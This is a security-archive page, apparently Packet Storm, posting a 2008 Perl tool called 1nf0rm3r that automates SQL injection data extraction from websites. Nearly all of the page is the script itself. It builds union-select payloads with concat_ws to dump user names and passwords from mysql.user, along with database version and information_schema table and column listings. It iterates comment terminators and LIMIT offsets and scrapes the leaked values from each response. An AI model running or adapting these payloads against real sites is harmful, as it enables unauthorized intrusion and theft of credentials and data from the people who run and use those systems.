what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

informer.txt

informer.txt
Posted Sep 8, 2008
Authored by sm4x

1nf0rm3r is a quick perl script that extracts database information from a website once leveraging a SQL injection vulnerability.

tags | tool, scanner, perl, sql injection
systems | unix
SHA-256 | 23db654aefd969cf38abbe0eb1ec9bb10aff74bceaba77a604a4dfa58320ab4b

informer.txt

Change Mirror Download
#!/usr/bin/perl
# sm4x - 2008
# 1nf0rm3r.pl
# quick perl script to extract db information via website sql injections
# v1.1 - 2008-08-20
# perl informer.pl <from> <to> (for limits)

use LWP::UserAgent;
use HTTP::Request;
#use Crypt::SSLeay;

@sqldata = ();
@warns = ();
@urlhits = ();

# account info (must be wrapped in $$<data>:$ or NO DATA IS DISPAYED!!)
#@account_vectors = (
#'concat_ws(0x24,0x24,concat_ws(0x3a,user,password,0x24))',
#);

# add ur own customs for more dumps
@account_vectors = (
'concat_ws(0x24,0x24,concat_ws(0x3a,userid,password,0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,user(),version(),user(),0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,table_schema,table_name,table_type,0x24))',
'concat_ws(0x24,0x24,concat_ws(0x3a,table_name,column_name,0x24))'
);

# account database info - custom
#@account_dbnames = (
#'mysql.user'
#);

@account_dbnames = (
'mysql.user',
'user',
'information_schema.tables',
'information_schema.columns'
);

#comments - custom
#@comments = (
#'--'
#);
@comments = (
'',
'--',
'/*'
);

# perl informer.pl <from> <to>
$offset = 0;
$sqldata = 0;
undef %dups;

$from_limit = scalar($ARGV[0]);
$to_limit = scalar($ARGV[1]);

system("clear");
print q{
[+] ---------------------------------------------------------------------
[+] .:: 1nf0rm4nt ::.
[+] ---------------------------------------------------------------------
};

printf("[+] Usage: perl informer.pl <from limit> <to limit>\n");
printf("[+] Target: http://target.com/index.php?<start link>,<injection_point>,<end link>\n");

if($from_limit > -1 && $to_limit > 0) {
printf("[+] Limit $from_limit to $to_limit\n");
}

# grab the md5
printf("[+] Site start link: ");
chomp($start_link = <STDIN>);
#$start_link = 'http://127.0.0.1/index2.php?&id=1+union+select+';

if($start_link !~ /http:\/\//) { $start_link = "http://" . $start_link; }

printf("[+] Site ending link: ");
chomp($end_link = <STDIN>);
#$end_link = ',2';

printf("[+] Targeting: $start_link$end_link\n");
printf("[+]--------------------------------\n");
printf("[+] .:: Scanning ... ::.\n");
foreach $v1(@account_vectors) {
$link = $start_link.$v1.$end_link;

# attach db with from <DBNAME>
foreach $db(@account_dbnames) {
if(length($db) > 0) { $link2 = $link.'+from+'.$db; } else { $link2 = $link; }
# limits?
if($from_limit != $to_limit && $to_limit>0) {
for($i = scalar($from_limit); $i < scalar($to_limit); $i++) {
$pwnd_link_limit = $link2 ."+limit+".$i.",1";

foreach $comment(@comments) {
$pwnd_link_limit_comments = $pwnd_link_limit.$comment;
$is_printed = 0;
#printf("LINK: $pwnd_link_limit_comments\n");
$request = HTTP::Request->new(GET=>$pwnd_link_limit_comments);
$useragent = LWP::UserAgent->new();

# check response
$response = $useragent->request($request);
if($response->is_success && $response->content =~ /\$\$/) {

my @vars = split(/\$\$/, $response->content);
foreach $item(@vars) {
if($item =~ /:\$/) {
#printf("INDEX: $item, $result\n");
#$c = index($item, ':$', 0);
$data = substr($item, 0, index($item, ':$', 0));
if(!$dups{$data}) {
push(@sqldata, $data); $dups{$data} = 1;
if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; }
$sqldata++;
}
#printf(".");
printf("[+] $data\n");

}
}
}
}
}
} else {
# attach comment and try
foreach $comment(@comments) {
$pwnd_link = $link2.$comment;
#printf("[+] Checking: $pwnd_link\n";
$is_printed = 0;
$request = HTTP::Request->new(GET=>$pwnd_link);
$useragent = LWP::UserAgent->new();

# check response
$response = $useragent->request($request);
if($response->is_success && $response->content =~ /\$\$/) {

my @vars = split(/\$\$/, $response->content);
foreach $item(@vars) {
if($item =~ /:\$/) {
#printf("INDEX: $item, $result\n");
#$c = index($item, ':$', 0);
$data = substr($item, 0, index($item, ':$', 0));
if(!$dups{$data}) {
push(@sqldata, $data); $dups{$data} = 1;
if(!$dups{$pwnd_link_limit_comments}) { push(@urlhits, $pwnd_link_limit_comments); $dups{$pwnd_link_limit_comments} = 1; }
$sqldata++;
}
#printf(".");
printf("[+] $data\n");
}
}
}
}
# printf(our injection
if(!$is_printed) {
unshift(@sqlinjections, $pwned_link);
#printf("----------------------------------------------------------\n[+] w00t:\n $pwnd_link\n----------------------------------------------------------\n");
$is_printed = 1;
}
}
}
}

# print found data (no dups)
print q{
[+] ---------------------------------------------------------------------
[+] .:: r3p0rt ::.
[+] ---------------------------------------------------------------------
};

#print returned results
foreach $item(@sqldata) {
printf("[+] $item\n");
}

# uncomment for sql query
#printf("[+] ---------------------------------------------------------------------\n");
foreach $item(@urlhits) {
printf("[+] $item\n");
}

printf("[+] ---------------------------------------------------------------------\n");
printf("[+] Total: $sqldata\n");
printf("\n[+] Done\n");

# done
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close